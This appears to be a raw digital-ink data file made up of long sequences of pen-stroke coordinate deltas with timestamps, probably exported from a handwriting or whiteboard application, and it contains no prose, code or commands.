18,-54-18,-19 0,-18 0,18 0,-36 18,19-18,-1 0,0 0,0 0,-18-18,18 18,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,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6:31.4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534 11311 0,'20'0'78,"20"0"-62,19 0-16,120 0 15,19 0-15,1 0 16,-41 0-16,-19 0 16,0 0-16,-79 0 15,-21 20-15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36.0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44 2205 0,'-35'0'15,"-18"17"-15,0 19 16,0-1-16,-53 18 16,-35 53-1,-18-18-15,-52 18 0,-1-18 16,-88 71-16,0-18 16,-352 106-1,317-71-15,70-17 16,89-36-16,35 1 15,70-18-15,53 17 16,18 1 0,459 475 15,-194-493-31,123 0 16,88 0-16,617 0 31,-740-194-16,-265-230 17,-123-70-17,-653-688 17,141 494-17,54 53 32,457 476-47,36 194 47,0 582-16,141 547 0,177-547-15,-212-617 0,-89-88-1,19-18 1,-19 0-16,36-53 16,0-53-16,18-17 15,-36 17-15,0-18 16,71-387-1,-88 352 1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53.5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98 5171,'73'0,"54"0,54-18,37 18,36-19,18 19,55 0,-55 37,54-37,-53 0,-38 0,-53 0,17 18,-53-18,-38 0,-53 0,-37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55.5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75 4935,'-18'0,"0"0,18 18,18-18,36 0,19 0,36 0,36 0,-18 18,18-18,18 0,37 0,-37 0,37 0,-1 0,1 18,0-18,-19 0,0 18,-17-18,35 0,-35 0,35 0,-36 0,37 0,-37 0,19 19,-19-19,-18 0,18 0,-36 0,-36 0,0 0,-37 0,-36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56.3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67 6459,'18'0,"18"0,55 0,18 0,90 0,-35 0,53 0,1 0,36 0,0 0,-36 0,-1 0,19 0,-18 0,0 0,-19 0,-35 0,-37 0,-37 0,-35 0,-19 0,0 0,-18 0,-18 18,19-18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57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57 8128,'18'0,"73"0,0 0,36 0,18 0,54 0,-35 0,71 0,19 0,0 0,-18 0,18 0,-36 0,0 0,18 18,-73-18,-18 0,-18 0,-36 0,18 0,-73 18,18-18,-17 0,-19 18,0-18,0 0,0 0,0 0,0 0,1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58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49 9416,'18'18,"18"-18,18 18,1-18,36 0,17 0,38 19,-1-19,54 0,-90 0,36 0,-18 0,-36 0,36 0,-54 0,-19 0,0 0,-17 0,-19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6:04.5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057 11611,'54'-18,"19"18,-37 0,18 0,19 0,36 0,36 0,0 0,0 0,37 0,-37 0,18 0,-36 0,18 0,18 0,37 0,0 0,-55 0,0 0,-36 0,72 0,-18 18,-36-18,0 0,-36 0,0 0,0 0,17 0,19 0,37 0,-37 0,18 0,0 0,0 0,55 0,-37 0,37 0,-37 0,36-18,-35 0,35 18,-35 0,17 0,-18 0,1 0,17-18,-18 18,-18 0,-18 0,0 0,-54 0,0 0,-37 0,-18 0,0 0,-54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50:37.7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15 2646 0,'0'17'0,"0"1"31,0 17-15,-106 36-1,-105 70 1,-742 794 31,777-670-47,-230 740 31,935-194 31,-264-811-46,1005-229 15,-1147 141-15,-4021-177 0,7902-440-1,-8714-424 16,8185 388-15,-3775 476 15,247 248 1,18 52-17,35 141-15,18 283 31,52-212-31,124 388 16,-35-71 15,-88-334-15,70-1 15,-71-123-31,-17-36 16,0 1-16,-17 17 15,16-17-15,-16-1 16,-19-17 31,-17-106-47,-35-35 0,35-71 16,-35-35-16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7:38.9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52 508,'-18'0,"-55"73,-90-19,-18 37,-37 36,-72 18,-128 54,19 55,0 37,36-110,0 55,128-73,71 1,55-74,37-35,72 54,0-73,54 36,55 55,91-18,72 36,290 128,-17-92,-1-18,55 19,-73-92,91 1,-164-73,-54-18,-145 0,0 0,-36 0,-91-36,-73 18,-17-73,-37 19,0-55,0-19,-109-53,0-1,-54-72,-255-127,-17-55,-109-126,-37 17,128 110,126 163,91 54,18 145,37 91,0 0,90 0,18 0,37 0,18 0,0 0,18 18,0 37,0 53,0 74,0-19,0 91,0 91,0 145,0 54,0 0,0 37,0-37,0 55,36-127,18-110,-17-108,17-72,1-19,-37-90,-18-55,18-18,18-36,19-1,-1-72,55-36,54-18,-18-73,19 55,35-55,55-109,-18-145,18-108,73 17,-110 146,-35 181,-37 54,0 19,-18-19,-73 19,19 72,-37 0,-36 18,0 37,0 17,0 1,0 18,0 0,0 0,-18 18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23.4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20 14315,'0'-18,"36"18,-18 0,0-19,37 19,-1 0,1 0,17 0,1 0,54-18,0 18,18 0,0-18,18 18,19 0,-19 0,0 0,37 0,-37 0,37 18,-1-18,19 0,18 0,18 0,-36 0,36 18,0-18,-18 0,18 0,-19 0,1 0,-18 19,54-19,-54 0,18 18,-19-18,19 0,0 0,0 0,18 0,-18 0,-18 0,-1 0,37 0,18 0,-18 0,0 0,37 0,-37 0,0 0,0 36,18-36,54 18,37-18,18 0,-72 0,17 36,73 1,55-37,-55 0,0 0,55 18,54 18,-127 37,-127-73,18 0,-72 36,162-18,-17-18,-36 0,-55 0,-37 0,-17 0,-37 0,-18 0,-18 0,-36 0,18 0,-37 0,-17 0,-1 0,-17 0,-1 0,-18 0,0 0,0-18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6:33.4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44 12283 0,'40'0'109,"99"0"-109,-80 0 16,100 0-16,20 0 15,39 0-15,20 0 16,0 0-16,40 0 16,-20 0-16,119 0 15,-59 0 1,-21 0-16,-59 0 16,-19 0-16,-21 0 15,-39 0-15,0 0 16,39 0-16,0 0 15,1 0-15,-80 0 16,60 0-16,-41 0 16,-58 0-16,-60 0 15,-1 0 48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24.6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87 15802,'0'0,"109"0,0 0,36 0,0 19,36 17,1 0,17-18,74-18,-56 0,37 18,37-18,17 0,-36 19,-36-19,0 0,-18 0,-19 0,-90 0,0 0,-73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28.2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139 7366,'18'0,"18"0,0 0,1 0,-1 0,-18 0,37 0,-1 0,0 0,19 0,-19 0,55 0,-18 0,54 0,0 0,91 0,18-18,0 18,18 0,91 0,-91 18,146 36,-74 19,-90-55,-18 18,-54 1,-19-19,-91-18,-53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29.9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48 8654,'18'0,"0"0,1 18,35-18,0 18,1-18,17 0,37 0,18 0,-18 0,18 0,18 0,-18 0,0 0,-36 0,-37-18,-17 0,-19 18,-36-18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24:02.9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75 4516 0,'0'-18'93,"18"18"-93,52-18 16,1 1-16,35 17 16,35-18-16,53 0 15,-18 18-15,36 0 16,-18 0-16,-18 0 16,19 0-16,-1 0 15,-36 0-15,36 0 16,-35 0-16,0 0 15,-18 0-15,-18 0 16,-17 0-16,0 0 16,0 0-16,0 0 15,17 0-15,18 0 16,0 0-16,1 0 16,-1 0-16,-36 0 15,1 0 1,-35 0-16,17 0 0,-35 0 15,18 0-15,-19 0 16,19 0 0,-18 0-16,17 0 15,19 0-15,-1 0 16,35 0-16,18 0 16,-17 0-16,17 0 15,18 0-15,-18 0 16,35 0-16,-70 0 15,18 0-15,-36 0 16,18 0-16,-18 0 16,35 0-16,1 0 15,-36 0-15,53 0 16,0 0-16,-17 0 16,34 0-16,19 0 15,-36 0-15,18 0 16,-1 0-16,-16 0 15,-1 0-15,-18 0 16,1 0-16,-19 0 16,19 0-16,-18 0 15,-18 0-15,35-17 16,89-19 0,-88 19-1,17-1-15,35 1 0,-35-1 16,124 18-1,-142 0 1,-35 0-16,1 0 16,16 0-16,-16 0 15,-19 0-15,107 0 16,-72-18 0,-34 18-16,35-17 15,-36 17-15,1 0 16,-18 0-16,0 0 15,-18 0-15,-17 0 16,-1 0-16,36 0 16,-18 0-16,1 0 15,17 0-15,-18 0 16,35 0-16,1 0 16,-18 0-16,18 0 15,-1-18-15,18 18 16,0 0-16,1 0 15,34 0-15,1 0 16,34 0-16,-17 0 16,1 0-16,-1 0 15,0 0-15,-18 0 16,1 0 0,-18 0-16,-1 0 0,-34 0 15,17 0 1,0 0-16,-17 0 15,-18 0-15,0 0 16,17 0-16,-17 0 16,53 0-1,-71 0-15,-17 0 16,0 0-16,-1 0 16,1 0 15,0 0-16,-1 0 1,1 0 0,-1 0-1,1 0 1,0 0-16,17 0 16,0 0-16,1 18 15,-19-18-15,1 0 16,-1 0-16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24:03.9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332 4445 0,'0'0'0,"18"0"47,0 0-47,17 0 15,0 0-15,36 0 16,-18 0-1,35 0-15,-18 0 0,18 0 16,36 0-16,17 0 16,18 0-16,52 0 15,1 0-15,0 0 16,-1 0-16,1 0 16,0 0-1,-36 0-15,18 0 0,-35 0 16,-18 0-16,-17 0 15,-1 0 1,-35 0-16,-17 0 0,-18 0 16,-18 0-16,-17 0 31,-1 0 94,-52 0-109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24:05.4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52 5733 0,'0'0'0,"35"-18"0,36 18 15,-1-18-15,54 1 16,-1-1-16,36 18 15,35 0-15,88 0 16,106 0-16,1 0 16,87 0-16,53 0 15,-53 0-15,-88 0 16,-88 0-16,-53 0 16,-18 0-16,-35 0 15,18 0-15,-18 0 16,-35 0-16,0 0 15,-36 0-15,-70 0 16,-18 0-16,-17 0 16,0 0 62,-1 0-78,36 0 0,35 0 15,36 0 1,35 0-16,35 0 16,17 0-16,-34 0 15,-1 0-15,-70 0 16,0 0-16,-53 0 16,-18 0-16,0 0 15,0 0-15,1 0 16,17 0-16,35 18 15,-18-18-15,19 17 16,-37-17-16,1 0 16,-17 18-16,-19-18 15,1 0 1,-18 18 31,-18-18-16,1 17-31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16:26.1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4251 0,'0'-18'32,"18"18"-1,17 0-31,0 0 15,36 0-15,35 0 16,35 0-16,53 0 16,0 0-16,70 0 15,54 0-15,-18 0 16,-53 0-16,-18 0 16,-17 0-16,-89 0 15,-70 0-15,-35 0 16,-1 0 15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16:28.2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30 4269 0,'18'0'63,"88"0"-48,17 17-15,71 1 16,-35 0-16,35-18 16,18 0-16,-36 0 15,36 0-15,-71 0 16,-35 0-16,-53 0 16,-18 0-16,0 0 15,-17 0 1,-1 0-16,1 0 31,0 0 0,-1 0-31,19 0 16,-19 0 0,19 0-1,-19 0-15,1 0 16,17 0-16,18-18 15,0 18-15,0 0 16,53 0-16,0 0 16,70 0-16,0 0 15,36 0-15,0 0 16,17 0-16,-17 0 16,-1 0-16,-17 0 15,-17 0-15,-1 0 16,-17-18-16,-18 1 15,-18-1-15,-17 0 16,-35 1-16,35-1 16,-36 18-1,-17 0-15,0 0 0,18 0 16,-54 0-16,1 0 16,17 0-1,-17 0 16,-1 0-15,19 0-16,-19 0 16,1 18-16,0-18 15,-18 17 48,17-17 46,1 0-93,17 0-16,18-17 15,0 17 1,18 0-16,-1 0 0,18 0 16,18 0-1,-18 0-15,1 0 16,16 0 0,-52 0-16,-35 0 125,0 0-11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16:29.7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368 4498 0,'17'0'62,"1"0"-62,17 0 16,0-18-16,18 1 15,0 17-15,18 0 16,17-18-16,35 0 16,18 1-16,71-36 15,35 35-15,0 1 16,-35-1-1,-89 18-15,-52 0 16,-36 0 0,0 18-16,-17-18 15,35 35-15,-18-18 16,18 19-16,-35-36 16,35 35-16,-36-35 15,-17 18-15,18-18 16,0 0-16,-1 17 15,18 1-15,1 0 16,-19-18 0,19 35-16,-19-18 15,19 19-15,-19-19 16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06.1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29 13879,'18'0,"18"0,19 0,17 0,-17 0,17 0,37 0,18 0,-18 0,36 0,0 0,37 0,-19 0,36 0,-35 0,72 0,-37 0,19 0,-37 0,1 0,-1 0,1 0,-37 0,0 0,-54 0,-19 0,-17 0,-19 0,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6:34.6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89 12184 0,'20'0'16,"-20"-20"-1,19 20 1,21-20-16,59 0 16,20 20-16,60 0 15,-20 0-15,-20 0 16,-60 0-16,-39 0 16,19 0-16,-19 0 15,-20 0-15,19 0 16,-19 0-1,0 0 126,-20-20-125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07.6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47 13843,'55'0,"-1"0,0 0,19 0,18 0,18 0,-1 0,74 0,-37 0,0 0,18 0,37 0,-55 0,55 36,-55-36,-36 18,54-18,-54 0,0 0,0 0,-19 0,-53 0,71 0,-17 0,-18 0,-19 0,1 0,-1 0,0 0,-17 0,-1 0,18 0,19 0,36 0,36 0,-18 0,-18 0,36 0,0 0,0 0,0 0,37 0,-37 0,0 0,-36 0,18 0,0 0,-36 0,36 0,36 19,18-19,-17 0,-19 0,54 0,-35 0,72 0,-37 0,37 0,-36-19,-37 19,36 0,-53 0,-1 0,-36 0,-37 0,-17 0,-37 0,0 0,0 0,-18-18,18 0,0 0,0 18,1 0,-38 0,1 0,-18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09.1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74 14950,'54'0,"-17"0,71 0,1 0,36 0,1-18,126-19,0 37,-54 0,17-18,-35 18,18-18,-19 18,-35 0,-1 0,-18 0,-36 0,-18 0,-55 0,0 0,-18 0,0 0,1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10.5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19 14877,'18'18,"19"-18,17 18,19 1,17-19,1 0,36 0,36 18,19-18,108 0,-18 18,37 0,54 18,54 1,-18-37,18 54,37-18,-37-18,37 19,-1-19,-90 0,36-18,-54 0,-18 54,-55-54,-55 0,-35 37,17 17,-72-36,19-18,-1 0,-18 18,-55-18,-17 19,-1-1,-18 0,-17-18,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0-18,-18 0,-18 18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11.7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28 16401,'0'0,"36"0,0 0,19 0,54 0,-19 0,110 0,0 0,17 0,74 0,-1 0,55 0,-73 0,0 18,-54-18,-37 0,-36 0,-36 18,-36 1,-37-19,0 18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5:12.6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682 16383,'0'0,"-18"-18,0 18,0 0,-19 0,19 0,-18 0,-55 0,-36 0,-36 0,-73 0,-72 0,-182 0,-91 0,-18 0,1 0,53 0,-35 0,-19 0,91-36,127-37,-145-18,181 1,91-1,109 55,54-1,55 19,18 18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2:31:29.4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80 441 0,'0'0'0,"0"18"0,0 17 15,0 0-15,-35 18 16,0-18-16,17 71 15,-35 18-15,-35 17 16,18 35-16,-19 1 16,-34-1-16,-1 18 15,36 0-15,-18-35 16,1-1-16,-1 1 16,53-35-16,-18-1 15,54-35 1,-19 18-16,36-53 15,0 0-15,18 0 16,53 0-16,-1 35 16,71 53-16,71-70 15,70 17-15,36-35 16,140 0-16,18-36 16,-35-17-16,0 0 15,-194 0-15,18 0 16,-89 0-16,-70 0 15,-71-17-15,-17-19 16,-18 1-16,0-35 16,-53-36-16,-35-35 15,-53-36-15,0-52 16,-159-88-16,35-36 16,-70-53-16,-88-123 15,35 70-15,-36 18 16,36 212-16,36 229 15,-1 0-15,35 0 16,89 0 0,106 0-16,17 0 15,70 0-15,19 0 16,-1 0-16,18 123 16,0 107-16,0 105 15,18 106-15,70 70 16,88 54-16,-35-36 15,36 18-15,70-53 16,-88-53-16,-1-36 16,1-87-16,-53-54 15,-18-52-15,0-71 16,-17 18-16,-18-71 16,0 0-1,-53-105 79,0-19-94,0 1 16,-18-71-16,-17-35 15,-18-53-15,-18-88 16,18-71-16,0-52 15,36-230-15,17 158 16,0-17-16,0 71 16,0 158-16,17 36 15,54 18 1,-36 52-16,18 53 16,0 35-16,-18 18 15,-17 36-15,17-1 16,-35 1-16,18-1 15,0 18 1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8:07.1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86 4300,'36'18,"19"-18,17 0,37 18,18 0,36 0,37 1,-37-1,-18 0,37 18,-37 0,0-17,18 17,-54-36,0 0,-36 18,-19 0,-36-18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46.6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96 4554,'18'0,"0"0,0 0,18 0,19 0,17 0,55 0,19 0,-1 0,18 0,18 0,1 0,-1 0,-36 0,1 0,17 0,-18 0,0 0,-18 0,0 18,-36-18,36 0,-36 0,17 0,19 0,-54 0,18 0,-19 0,1 0,18 0,-19 0,19 0,-19 0,37 0,-36 0,18 0,-19 0,37 0,-18 0,18 0,-19 0,55 0,1 0,-19 0,0 0,0 0,-37 0,-17 0,36 0,-19 0,1 0,-18 18,-1-18,-17 18,17-18,-17 0,17 0,19 0,-18 0,17 0,-53 0,35 0,-17 0,-1 0,19 0,-37 0,0 0,-18 0,0 0,19 0,-19 0,18 0,0 0,-17 0,-1 0,0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9:31.1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32 10323,'19'0,"35"0,37 0,-1 0,56 0,53 0,-17 0,-1 0,0 0,-35 0,-1 0,-36 0,-37 0,-54 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9:31.7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82 10287,'36'0,"1"0,72 0,18 0,0 0,-19 0,74 0,-37 0,0 0,0 0,-54 0,54 0,-72 0,-1 0,1 0,-19 0,-1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6:36.3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732 12462 0,'20'0'63,"39"0"-47,60 0-16,100 0 15,-140 0-15,199 0 16,0 0-16,-80 0 15,20 0-15,-59 0 16,-20 0-16,-40 0 16,20 0-16,-20 0 15,40 0 1,20 0-16,0 0 0,0 0 16,-1 0-1,1 0-15,-20 0 0,-40 0 16,-39 0-1,-40 0-15,19 0 0,1 0 16,-20 0 0,0 0-1,0 0-15,19 0 16,1 0 0,0 0-16,19 0 15,-19 0-15,-1 0 16,-19 0-16,0 0 15,0 0 1,0 0 31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9:32.4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86 10396,'18'0,"18"0,1 0,17 0,19 0,54 0,18 0,-36 0,72 0,-18 0,-36 0,-18 0,36 0,-36 0,-54 18,-19-18,-18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9:33.2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535 10487,'18'0,"18"0,19 0,17 0,1 0,17 0,37 0,37 0,-19 0,-36 0,-19 0,19 0,-36 0,-1 0,-35 0,-19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19:33.9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67 10468,'18'0,"0"0,0 0,0 0,37 0,-1 0,37 0,0 0,54 0,0 0,-18 0,-36 0,-1 0,-35 19,-19-19,0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0:25.0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66 5461,'18'0,"1"0,17 0,0 0,-18 0,0 0,19 0,-1 0,18 0,19 0,-19 0,-17 0,-19 0,18 0,0 0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2:11.2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84 7820,'37'0,"-1"0,37 0,-19 0,55 0,-18 0,90 0,-36 0,0 0,-36 0,18 0,-18 0,-18 0,-19 0,-35 0,-19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2:26.8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22 7783,'37'0,"-19"0,0 0,0 0,0 0,0 0,19 0,-1 0,-18 0,0 0,18 0,-17 0,17 0,-18 0,0 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2:27.6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294 7747,'18'0,"0"0,0 0,0 0,0 0,19 0,-19 0,0 0,0 0,0 0,0-18,0 18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2:45.6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393 10559,'36'0,"-18"-18,-18 0,55 18,-1 0,1 0,-1 0,-18 0,37 0,-1 0,1 0,-37 0,37 0,-19 0,-36 0,19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3:03.8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69 12482,'0'0,"18"0,18 0,-18 0,0-18,19 18,-19 0,0 0,18 0,-18 0,0 0,37 0,-19 0,0 0,37 0,36 0,18 0,36 0,37 0,-1 0,73 0,-54-18,18-18,-18 36,-1 0,-17 0,18 18,-55-18,-36 0,0 0,-54 0,-37 0,-18 0,0 0,0 0,0 0,1 0,-1 0,0 0,0-18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3:04.9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66 13498,'0'0,"18"0,0 0,0 0,0 0,19 0,17 0,1 0,17 0,1 0,-19 0,-18 0,-17 0,-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1:53.2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560 14605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3:06.5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50 13353,'18'0,"0"0,1 0,-1 0,0 0,0 0,18 0,19-18,-19 18,18 0,1 0,-19 18,0-18,1 0,17 0,-18 18,1-18,-19 0,0 0,0 18,0-18,0 0,1 0,-1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3:11.4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271 13281,'18'0,"0"0,1 0,35 0,0 0,-17 0,-1 0,18 0,1 0,-19 0,0 0,19 0,-1 0,19 0,-19 0,1 0,17 0,-17 0,17 0,-17 0,-1 0,-36 0,19 0,-1 0,0 0,0 0,-17 0,-1 0,0 0,0 0,0 0,0 0,19-19,-19 19,0 0,0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24:13.1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58 1869,'0'18,"18"0,37 36,-1 19,37-37,-37 19,19-1,0-18,35 37,-53-55,17 18,1 1,36-1,-73-36,37 0,-19 0,1 0,-19 0,18 0,37-36,-37-19,19 1,18-19,-19-17,-17 53,17-35,1 35,-1 19,-17-36,-1 18,-17 36,-19-19,0 1,0 0,0 18,-18-18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58.0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49 6078,'54'0,"-18"0,1 0,17-18,0 18,1 0,-1 0,37-18,18 18,-18 0,36 0,-37 0,55 0,-18 0,-36-19,-18 19,-55 0,0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58.9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40 5969,'0'0,"54"0,37 0,0 0,-37 0,37 0,-18 0,-19-36,19 36,-1 0,1 0,-19 0,1 0,-1 0,-18 0,1 0,-19 0,0 0,0 0,18 0,-18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00.1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763 6132,'18'0,"37"0,-19 0,18 0,19 0,18 0,18 0,-1 0,38 0,-1 0,18 0,-54 0,36 0,36 0,-35 0,-1 0,18 55,18-55,-72 0,36 0,-18 0,-18 18,-36-18,18 0,-37 0,-18 0,19 0,-19 0,18 18,-35-18,17 0,-18 0,0 18,37-18,-19 0,-18 0,0 0,18 0,-17 0,17 0,-18 0,0 0,0 0,0 0,19 0,-1 0,-18 0,18 0,1 0,-1 0,-18 0,0 0,0 0,1 0,17 0,-18 0,0 0,18 0,-17 0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00.8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62 6205,'18'0,"37"0,17 0,55 0,0 0,19 0,17 0,18 0,-36 0,1 0,17 0,-18 0,18 0,-36 0,0 0,18 0,-18 0,-36 0,36 0,-36 0,18 0,-37 18,1-18,-1 0,-17 18,-1-18,1 0,-1 0,-18 18,19-18,-19 0,0 0,1 0,-19 0,36 18,-17-18,-19 19,0-19,0 0,0 0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01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51 6223,'0'0,"55"0,-37 0,54 0,19 0,-36-36,72 36,54 0,-18 0,-18 0,19 0,-19 0,0 0,0 0,37 0,-37 0,0 0,-54 0,-19 0,1 0,-19 0,-36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06.2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190 6060,'18'0,"18"0,19 0,-1 0,19 0,36 0,-19 0,37 0,0 0,-36 0,36 0,-36 0,18 0,18 0,-18 0,-1 0,-71 0,17 0,1 0,-19 0,-18 0,18 0,-18 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,-36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09.7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58 9162,'36'0,"-18"-18,37 18,-19 0,37 0,-19 0,37 0,-19 0,55 0,18 0,-18 0,0 0,-18 0,36 0,1 0,35 0,-18 0,37 0,18 0,-19 0,19 0,36-18,-18 18,-19 0,1 0,0 0,-37 0,19 0,-37 0,109 0,-72 0,36 0,-73 0,37 0,-1 54,-17-54,-19 0,-36 18,0 1,-18-19,0 0,-19 0,-35 0,-1 0,-18 0,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1:58.6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312 8309,'0'0,"18"0,18 0,0 0,1 0,-1 0,0 0,19 19,-1-19,19 0,54 0,-37 0,37 0,19 0,-19 0,36 0,-36 0,36 0,-18 0,0 0,55 0,-55 0,18 0,37 0,-19 0,37 0,-18 0,-55 18,54-18,-72 0,19 18,17 0,-36-18,18 0,0 0,-18 0,-36 0,36 0,-36 0,-37 0,19 0,-1 0,1 0,-37 0,-18 0,0 0,19 0,-1 0,0 0,-18 0,37 0,-1 0,1 0,17 0,1 0,36 0,-19 0,-35 0,-1 0,19 0,-19 0,37 0,0 0,-19 0,-17 0,-19 0,18 0,-17 0,-1 0,-18 0,0 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3:11.4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84 10541,'37'0,"-19"0,54 0,1 0,36 0,18 18,18-18,18 0,37 0,54 0,-36 0,144 0,-53 0,54-18,-73 18,182 0,18 0,54 0,0 0,0 0,-163 0,73 0,-109 0,-37 0,91 0,-54 36,72-18,-72-18,72 19,-181-19,18 0,18 36,0-36,-90 0,-1 0,-36 0,1 0,-1 0,0 0,0 0,0 0,18 0,37 0,-19 0,1 0,-19 0,73 0,36 0,-36 0,0 0,72-18,-54 18,18 0,-18 0,37 0,-37 0,0 0,-18 0,-37 0,1-18,-19 18,1 0,-1 0,0 0,-17 0,-19 0,18 0,-18 0,-18 0,18 0,-18-19,37 19,-19-18,54 0,-17-18,-37 36,0 0,-18 0,-36 0,36 0,-18 0,18 0,-18 0,-1 0,1 0,-18 0,-18 0,-19 0,19 0,-19 0,0 0,-17 0,-19 0,18 0,0 0,-17 0,53 0,-17 0,-1-18,0 0,19-1,0 1,54 18,-55 0,37 0,-18 0,18-18,-19 18,-17 0,-1 0,-17 0,-37 0,-54-18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3:24:35.7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99 7144 0,'18'0'31,"-1"17"-15,36-17-16,18 0 15,34 0-15,37 36 16,-1-19-16,70 19 16,1-19-16,0 36 15,35-35 1,-18 17-16,-17-17 16,405-1-1,-476-17 1,-17 0-16,-19 0 15,1 0-15,-18 0 16,18 18-16,35 0 16,89 17 15,-177-35-31,17 18 16,1-18-16,-1 17 15,1-17-15,-18 18 16,17-18-16,-17 0 15,-18 0-15,1 0 16,17 0 0,-36 0-1,1 0 17,0 0-17,17 0 1,-17 17-16,-1-17 15,36 0 17,-35 0 14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3:24:37.9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02 7514 0,'0'-17'16,"18"17"-1,35 0-15,35 0 16,53 0-16,0 0 16,53 0-16,0 35 15,-17-18-15,34 1 16,195 0 0,-71 17-1,-194-35-15,0 0 16,18 0-16,-18 0 15,194 0 1,-123 18 0,0-1-16,-1 1 0,1 0 15,-53-18 1,17 17-16,-35-17 16,-53 0-16,18 0 15,-35 0-15,-18 0 16,-18 0-16,36 0 15,-36 0-15,53 0 16,36 35-16,52-17 16,0 0-16,54 35 15,-1-36-15,-17 19 16,-18-36-16,-36 35 16,-16-35-16,-72 0 15,-17 0-15,-18 0 16,-17 0 15,17 18-15,-17-18-1,88 0 1,-53 0-16,17 0 16,1 0-16,123 0 31,-71-36-31,1-17 15,-1 0 1,18 18-16,-35 35 0,0 0 16,17 0-1,1 0-15,87 0 16,-158-18 0,18 1-16,17-36 15,0 18-15,-35-18 16,-17 17-16,34 19 15,-52-1-15,-1 18 16,1 0-16,0 0 16,-1 0-16,19 0 15,-1 0-15,-17 0 16,-1 0-16,18 18 16,-17-18-16,0 17 15,-1-17-15,1 0 16,0 18-16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3:24:39.4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46 5786 0,'-18'0'46,"71"0"-30,18 0 0,52 0-1,1 0-15,-36 0 16,35 0-16,-35 0 0,18 0 16,-18 0-1,-35 0-15,0 0 16,18-18-16,-36 18 15,18 0-15,-35 0 16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3:24:40.5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27 5680 0,'35'-36'16,"18"36"-16,-18 0 16,1-17-16,17-1 15,17 18-15,36-17 16,0 17-16,35 0 16,53 0-16,18 0 15,52 0-15,18 0 16,-35 0-16,71 0 15,70 0-15,53 0 16,811 0 15,-581 0-15,-442 0-16,-17-18 0,-18 0 16,-71 1-1,-17-19-15,-53 19 0,17-1 16,1-35-1,-18 36-15,53-36 16,35 17-16,35 19 0,-17-1 16,53 0-1,-1 18-15,-17 0 16,18 0-16,0 0 16,-36 0-16,-17 0 15,35 0-15,-36 0 16,37 0-1,-143 0-15,-16 0 16,17 0-16,-18 0 16,18 0-16,0 0 15,-18 0-15,0 0 16,36 0 0,-36-17-16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3:25:05.1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93 10654 0,'0'-18'47,"17"18"-47,36-17 16,53 17-16,18-18 15,-1 0-15,18 1 16,0-1-16,18 0 15,0 1-15,0-1 16,-1 1 0,319-36-1,-319 53-15,-17 0 16,1 0-16,-1 0 16,17 0-16,125 0 31,-125 0-31,19 0 15,-36 0-15,35 0 16,18 0-16,-35 0 16,53 0-16,-1 0 15,-17 0-15,-35 0 16,0 0-16,-18 0 16,-35 0-16,17 0 15,-52 0-15,17 0 16,0 0-16,0-18 15,-35 18-15,-17-18 16,17 18-16,-36 0 16,54 0-1,-54 0 1,36 0 0,-35 0-16,0-17 15,-1 17 1,1 0-1,0 0-15,-1 0 16,36 0-16,-35 0 16,17 0-1,0 0-15,-17 0 0,35 0 16,0 0-16,0 0 16,17 0-16,18 0 15,1 0-15,34 0 16,-17 0-1,0 0-15,-36 0 16,1 0-16,-36 0 16,0 0-1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41.6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35 4409,'0'0,"54"0,0 0,-17 0,35 0,-17 0,-1 0,1 0,-19 18,18 0,-36-18,19 18,17-18,1 36,-37-36,18 0,0 0,-18 0,37 0,-37 0,0 0,18 0,1 0,-19 0,0 0,0 0,0 0,0 0,1 0,-1 0,36 0,-36 0,0 0,19 0,-19 0,18 0,-18 0,19 0,-1 0,-18 0,0 0,18 0,-17 0,-1 0,0 0,0 0,0 0,18 0,1 0,17 19,-18-1,-17-18,17 0,-18 0,0 0,0 0,0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42.7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059 4264,'0'18,"18"0,18-18,19 0,35 0,55 0,-54 0,54 0,-18 0,37 0,-37 0,0 18,-19-18,-17 0,-18 0,-37 18,0-18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17.4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12 4463,'37'0,"-19"0,36 0,-18 0,19 0,36 0,17 0,-35 0,72 0,-18 18,18-18,0 0,1 0,17 0,0 0,-36 0,18 0,-18 0,0 0,-18 0,0 0,0 0,36 0,36 0,-35 0,-1 0,18 18,18-18,-17 0,-19 0,54 19,-35-19,35 0,-17 0,-1 0,1 0,-37 0,72 0,-35 0,-1 18,-36-18,37 0,-19 18,-72-18,36 0,-18 0,-37 0,1 0,-37 0,37 0,-37 0,18 0,19 0,-37 0,37 18,-19-18,19 0,36 18,-37-18,-17 0,-1 0,1 0,-1 18,-18 0,1-18,-19 0,18 0,-18 0,37 0,-37 0,36 19,-18-19,-17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18.7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73 5806,'0'0,"36"0,0 0,0 0,19 0,-1 0,-17 18,-1-18,55 18,-37-18,19 0,35 0,-17 0,-18 0,17 0,37 0,-18 0,0 0,-36 0,17 0,-35 0,-19 0,-18 0,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5:20.2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303 8290 0,'-18'0'47,"88"0"156,19 0-187,-19 0-16,1 0 15,52 0-15,-17 0 16,18 0-16,-1 0 16,53 0-16,-52 0 15,35 0-15,52 18 16,-17 35-16,0-36 16,-35-17-16,35 0 15,-53 0-15,53 0 16,-53 0-16,0 0 15,1 0-15,-1 0 16,0 0 0,0 0-16,18 0 15,-54 18-15,1-18 16,0 0-16,88 18 16,-53 35-1,-53-36-15,1-17 16,-19 0-16,54 36 15,-1-1-15,36 0 16,0 18-16,176 18 16,-212-54-1,18-17-15,-17 18 16,-1 0-16,-52-18 16,17 35-16,-53-35 15,1 0-15,-19 0 16,19 0 15,16 0-15,-16 0-1,17 0-15,17 0 16,-17 17-16,18 1 16,-1-18-1,36 0-15,-18 0 16,-17 0-16,-1 0 15,1 0-15,-18 0 16,0 0-16,-18 0 16,-17 0 15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23.4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58 4336,'36'0,"37"0,-19 0,19 18,36 0,-37 1,55 35,-72-54,-1 18,19-18,-19 0,-17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24.4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28 4481,'0'-18,"18"18,0 0,37 0,-19 0,19 0,-1 0,37 0,-1 0,56 0,-1-18,54 18,1 0,-19 0,19 0,18 36,54-18,0 19,109 35,-145-54,0 1,36 35,54-18,-72-18,-72-18,17 55,-72-55,55 0,-1 0,-54 0,-36 0,-37 0,1 0,-37 0,0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46:16.3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49 11992,'0'0,"36"-18,18 0,37 0,72 0,19 18,-1-18,55 18,91 0,72 0,91 0,54 0,55 18,144-18,38 0,71 36,74-36,-37 36,18 1,18-37,18 90,1-53,-1-37,-163 0,-90 0,-91 0,-55 0,36 0,-35 0,-55 0,18 0,-146 36,-17-36,-91 18,-54-18,-1 36,-72-17,-90-1,-19-18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46:17.7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69 13027,'18'0,"0"0,0 0,0 0,19 0,17 0,1 0,-19 0,36 0,19 0,36 0,0-19,55 19,35 0,55 0,91 0,127 0,18 0,73 0,271 